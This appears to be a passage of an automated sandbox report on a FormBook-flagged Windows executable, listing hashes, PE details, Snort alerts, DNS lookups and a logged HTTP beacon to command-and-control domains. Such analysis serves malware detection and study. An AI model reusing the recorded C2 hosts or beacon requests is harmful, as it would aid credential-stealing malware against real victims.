                                                                                    SHA-512:34EF5F6D5EAB0E5B11AC81F0D72FC56304291EDEEF6D19DF7145FDECAB5D342767DBBC0B4384B8DECB5741E6B85A4B431DF14FBEB5DDF2DEE103064D2895EABB
                                                                                    Malicious:true
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi
                                                                                    C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Process:C:\Users\user\Desktop\HOPEFUL.exe
                                                                                    File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):42080
                                                                                    Entropy (8bit):6.2125074198825105
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
                                                                                    MD5:F2A47587431C466535F3C3D3427724BE
                                                                                    SHA1:90DF719241CE04828F0DD4D31D683F84790515FF
                                                                                    SHA-256:23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
                                                                                    SHA-512:E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: BLESSINGS.exe, Detection: malicious, Browse
                                                                                    • Filename: QP-0766.scr.exe, Detection: malicious, Browse
                                                                                    • Filename: order-181289654312464648.exe, Detection: malicious, Browse
                                                                                    • Filename: PO_60577.exe, Detection: malicious, Browse
                                                                                    • Filename: IMG_73344332#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                                    • Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse
                                                                                    • Filename: Doc#6620200947535257653.exe, Detection: malicious, Browse
                                                                                    • Filename: SecuriteInfo.com.Generic.mg.15368412abd71685.exe, Detection: malicious, Browse
                                                                                    • Filename: RT-05723.exe, Detection: malicious, Browse
                                                                                    • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: cFAWQ1mv83.exe, Detection: malicious, Browse
                                                                                    • Filename: I7313Y5Rr2.exe, Detection: malicious, Browse
                                                                                    • Filename: SWIFT-COPY Payment advice3243343.exe, Detection: malicious, Browse
                                                                                    • Filename: bWVvaTptgL.exe, Detection: malicious, Browse
                                                                                    • Filename: umOXxQ9PFS.exe, Detection: malicious, Browse
                                                                                    • Filename: BL,IN&PL.exe, Detection: malicious, Browse
                                                                                    • Filename: ORDER #0554.exe, Detection: malicious, Browse
                                                                                    • Filename: Dekont.pdf.exe, Detection: malicious, Browse
                                                                                    • Filename: IMG_84755643#U00e2#U20ac#U00aegpj.exe, Detection: malicious, Browse
                                                                                    • Filename: 8WLxD8uxRN.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................|w......H........#...Q...................u.......................................0..K........-..*..i....*...r...p.o....,....r...p.o....-..*.....o......o.....$...*.....o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o*....(+...o,.....&...(-....*.......3..@......R...s.....s....(....*:.(/.....}P...*J.{P....o0..

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):7.485992003606985
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    File name:HOPEFUL.exe
                                                                                    File size:3437056
                                                                                    MD5:9c15af175868121cc014666189d52dae
                                                                                    SHA1:3ba03f47a8762368538e47806353f55da43d46ac
                                                                                    SHA256:7c8f873fc34661a785875f76a1f3b1aff6719e69d2a4ea5d2d94f849282b623a
                                                                                    SHA512:48fb5c66bda58fa8b76e276e61afc36576cddb9e27a601767e10f2d554c669613249aca6908191cb30a850b8ef207a69bb1a73c1fe25c93e7ef40379a3950a02
                                                                                    SSDEEP:98304:KVYMenFZrSmVobxfPUp75Xr6/UUyRGSG:KVYMejQ5cnE
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.P.................f4.........~.4.. ........@.. ........................4...........`................................

                                                                                    File Icon

                                                                                    Icon Hash:00828e8e8686b000

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x74847e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                    Time Stamp:0x50A34A16 [Wed Nov 14 07:36:54 2012 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3484280x53.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x34a0000x632.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x34c0000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x3464840x346600unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x34a0000x6320x800False0.35595703125data3.69840070371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x34c0000xc0x200False0.041015625data0.0940979256627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountry
                                                                                    RT_VERSION0x34a0a00x3a8data
                                                                                    RT_MANIFEST0x34a4480x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Version Infos

                                                                                    DescriptionData
                                                                                    Translation0x0000 0x04b0
                                                                                    LegalCopyrightCopyright 2014 B6:HF663F:=754JC@:4:85B
                                                                                    Assembly Version1.0.0.0
                                                                                    InternalNameHOPEFUL.exe
                                                                                    FileVersion8.12.16.20
                                                                                    CompanyNameB6:HF663F:=754JC@:4:85B
                                                                                    Comments=G5HB;3;JB3AHC8A5B4
                                                                                    ProductNameJFB=@6=@D8H94@H53JCD
                                                                                    ProductVersion8.12.16.20
                                                                                    FileDescriptionJFB=@6=@D8H94@H53JCD
                                                                                    OriginalFilenameHOPEFUL.exe

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    01/13/21-21:49:23.525067TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.335.169.40.107
                                                                                    01/13/21-21:49:23.525067TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.335.169.40.107
                                                                                    01/13/21-21:49:23.525067TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.335.169.40.107
                                                                                    01/13/21-21:49:44.263031TCP1201ATTACK-RESPONSES 403 Forbidden804975834.98.99.30192.168.2.3
                                                                                    01/13/21-21:50:25.240293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                                    01/13/21-21:50:25.240293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                                    01/13/21-21:50:25.240293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976080192.168.2.334.102.136.180
                                                                                    01/13/21-21:50:25.382643TCP1201ATTACK-RESPONSES 403 Forbidden804976034.102.136.180192.168.2.3

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 13, 2021 21:49:23.396194935 CET4975680192.168.2.335.169.40.107
                                                                                    Jan 13, 2021 21:49:23.524663925 CET804975635.169.40.107192.168.2.3
                                                                                    Jan 13, 2021 21:49:23.524789095 CET4975680192.168.2.335.169.40.107
                                                                                    Jan 13, 2021 21:49:23.525067091 CET4975680192.168.2.335.169.40.107
                                                                                    Jan 13, 2021 21:49:23.652430058 CET804975635.169.40.107192.168.2.3
                                                                                    Jan 13, 2021 21:49:23.657845974 CET804975635.169.40.107192.168.2.3
                                                                                    Jan 13, 2021 21:49:23.657886982 CET804975635.169.40.107192.168.2.3
                                                                                    Jan 13, 2021 21:49:23.658147097 CET4975680192.168.2.335.169.40.107
                                                                                    Jan 13, 2021 21:49:23.658185959 CET4975680192.168.2.335.169.40.107
                                                                                    Jan 13, 2021 21:49:23.785579920 CET804975635.169.40.107192.168.2.3
                                                                                    Jan 13, 2021 21:49:44.083266020 CET4975880192.168.2.334.98.99.30
                                                                                    Jan 13, 2021 21:49:44.123872042 CET804975834.98.99.30192.168.2.3
                                                                                    Jan 13, 2021 21:49:44.123975039 CET4975880192.168.2.334.98.99.30
                                                                                    Jan 13, 2021 21:49:44.124205112 CET4975880192.168.2.334.98.99.30
                                                                                    Jan 13, 2021 21:49:44.164644003 CET804975834.98.99.30192.168.2.3
                                                                                    Jan 13, 2021 21:49:44.263031006 CET804975834.98.99.30192.168.2.3
                                                                                    Jan 13, 2021 21:49:44.263072968 CET804975834.98.99.30192.168.2.3
                                                                                    Jan 13, 2021 21:49:44.263585091 CET4975880192.168.2.334.98.99.30
                                                                                    Jan 13, 2021 21:49:44.263648033 CET4975880192.168.2.334.98.99.30
                                                                                    Jan 13, 2021 21:49:44.306463957 CET804975834.98.99.30192.168.2.3
                                                                                    Jan 13, 2021 21:50:04.650918961 CET4975980192.168.2.3174.136.37.109
                                                                                    Jan 13, 2021 21:50:04.807600975 CET8049759174.136.37.109192.168.2.3
                                                                                    Jan 13, 2021 21:50:04.807812929 CET4975980192.168.2.3174.136.37.109
                                                                                    Jan 13, 2021 21:50:04.808011055 CET4975980192.168.2.3174.136.37.109
                                                                                    Jan 13, 2021 21:50:04.976430893 CET8049759174.136.37.109192.168.2.3
                                                                                    Jan 13, 2021 21:50:04.984437943 CET8049759174.136.37.109192.168.2.3
                                                                                    Jan 13, 2021 21:50:04.984461069 CET8049759174.136.37.109192.168.2.3
                                                                                    Jan 13, 2021 21:50:04.985187054 CET4975980192.168.2.3174.136.37.109
                                                                                    Jan 13, 2021 21:50:04.985217094 CET4975980192.168.2.3174.136.37.109
                                                                                    Jan 13, 2021 21:50:05.139323950 CET8049759174.136.37.109192.168.2.3

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 13, 2021 21:47:33.673636913 CET6083153192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:33.724451065 CET53608318.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:34.610465050 CET6010053192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:34.661415100 CET53601008.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:36.042474031 CET5319553192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:36.099013090 CET53531958.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:37.292948961 CET5014153192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:37.343573093 CET53501418.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:38.442462921 CET5302353192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:38.491338968 CET53530238.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:42.656128883 CET4956353192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:42.712754965 CET53495638.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:44.711277962 CET5135253192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:44.759174109 CET53513528.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:45.872056961 CET5934953192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:45.919939041 CET53593498.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:47.080563068 CET5708453192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:47.128431082 CET53570848.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:48.243196011 CET5882353192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:48.291208982 CET53588238.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:49.395819902 CET5756853192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:49.443736076 CET53575688.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:50.622510910 CET5054053192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:50.673412085 CET53505408.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:47:52.519221067 CET5436653192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:47:52.567094088 CET53543668.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:04.152533054 CET5303453192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:05.169562101 CET5303453192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:05.217772007 CET53530348.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:05.671885967 CET5776253192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:05.731378078 CET53577628.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:11.419425964 CET5543553192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:11.477761030 CET53554358.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:21.501506090 CET5071353192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:21.552089930 CET53507138.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:22.449331999 CET5613253192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:22.509794950 CET53561328.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:22.664505005 CET5898753192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:22.720869064 CET53589878.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:22.818278074 CET5657953192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:22.879911900 CET53565798.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:31.238954067 CET6063353192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:31.296679974 CET53606338.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:38.495464087 CET6129253192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:38.557069063 CET53612928.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:39.186431885 CET6361953192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:39.243732929 CET53636198.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:40.269027948 CET6493853192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:40.316947937 CET53649388.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:40.813632011 CET6194653192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:40.872780085 CET53619468.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:41.623128891 CET6491053192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:41.670948982 CET53649108.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:42.367764950 CET5212353192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:42.426841021 CET53521238.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:42.755604982 CET5613053192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:42.829658031 CET53561308.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:43.036227942 CET5633853192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:43.084266901 CET53563388.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:44.424235106 CET5942053192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:44.485919952 CET53594208.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:48.240782022 CET5878453192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:48.299400091 CET53587848.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:48:49.050465107 CET6397853192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:48:49.098325014 CET53639788.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:49:08.150971889 CET6293853192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:49:08.225167990 CET53629388.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:49:11.770323992 CET5570853192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:49:11.818288088 CET53557088.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:49:23.327256918 CET5680353192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:49:23.387768984 CET53568038.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:49:25.993846893 CET5714553192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:49:26.041655064 CET53571458.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:49:44.018774033 CET5535953192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:49:44.081831932 CET53553598.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:50:04.467032909 CET5830653192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:50:04.649347067 CET53583068.8.8.8192.168.2.3
                                                                                    Jan 13, 2021 21:50:25.127614975 CET6412453192.168.2.38.8.8.8
                                                                                    Jan 13, 2021 21:50:25.198852062 CET53641248.8.8.8192.168.2.3

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Jan 13, 2021 21:49:23.327256918 CET192.168.2.38.8.8.80x7fa5Standard query (0)www.the343radio.comA (IP address)IN (0x0001)
                                                                                    Jan 13, 2021 21:49:44.018774033 CET192.168.2.38.8.8.80xdfc0Standard query (0)www.registeredagentfirm.comA (IP address)IN (0x0001)
                                                                                    Jan 13, 2021 21:50:04.467032909 CET192.168.2.38.8.8.80x718Standard query (0)www.tiendazoom.comA (IP address)IN (0x0001)
                                                                                    Jan 13, 2021 21:50:25.127614975 CET192.168.2.38.8.8.80xad17Standard query (0)www.eaglesnestpropheticministry.comA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Jan 13, 2021 21:49:23.387768984 CET8.8.8.8192.168.2.30x7fa5No error (0)www.the343radio.com35.169.40.107A (IP address)IN (0x0001)
                                                                                    Jan 13, 2021 21:49:23.387768984 CET8.8.8.8192.168.2.30x7fa5No error (0)www.the343radio.com34.225.31.148A (IP address)IN (0x0001)
                                                                                    Jan 13, 2021 21:49:44.081831932 CET8.8.8.8192.168.2.30xdfc0No error (0)www.registeredagentfirm.comregisteredagentfirm.comCNAME (Canonical name)IN (0x0001)
                                                                                    Jan 13, 2021 21:49:44.081831932 CET8.8.8.8192.168.2.30xdfc0No error (0)registeredagentfirm.com34.98.99.30A (IP address)IN (0x0001)
                                                                                    Jan 13, 2021 21:50:04.649347067 CET8.8.8.8192.168.2.30x718No error (0)www.tiendazoom.comtiendazoom.comCNAME (Canonical name)IN (0x0001)
                                                                                    Jan 13, 2021 21:50:04.649347067 CET8.8.8.8192.168.2.30x718No error (0)tiendazoom.com174.136.37.109A (IP address)IN (0x0001)
                                                                                    Jan 13, 2021 21:50:25.198852062 CET8.8.8.8192.168.2.30xad17No error (0)www.eaglesnestpropheticministry.comeaglesnestpropheticministry.comCNAME (Canonical name)IN (0x0001)
                                                                                    Jan 13, 2021 21:50:25.198852062 CET8.8.8.8192.168.2.30xad17No error (0)eaglesnestpropheticministry.com34.102.136.180A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.the343radio.com
                                                                                    • www.registeredagentfirm.com
                                                                                    • www.tiendazoom.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.34975635.169.40.10780C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Jan 13, 2021 21:49:23.525067091 CET7329OUTGET /jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp HTTP/1.1
                                                                                    Host: www.the343radio.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Jan 13, 2021 21:49:23.657845974 CET7330INHTTP/1.1 301 Moved Permanently
                                                                                    Server: openresty
                                                                                    Date: Wed, 13 Jan 2021 20:49:23 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Location: https://www.the343radio.com/jqc/?vJBt9=0p-TOvv8KBuxgpiP&ndlpiZc=Jqp6Vrh7x4dPMrIQX7VIzLiEvICxUcdwdSrDbGPbei90zUxLRJiOLwAKv7MnajRyqhPp
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.34975834.98.99.3080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
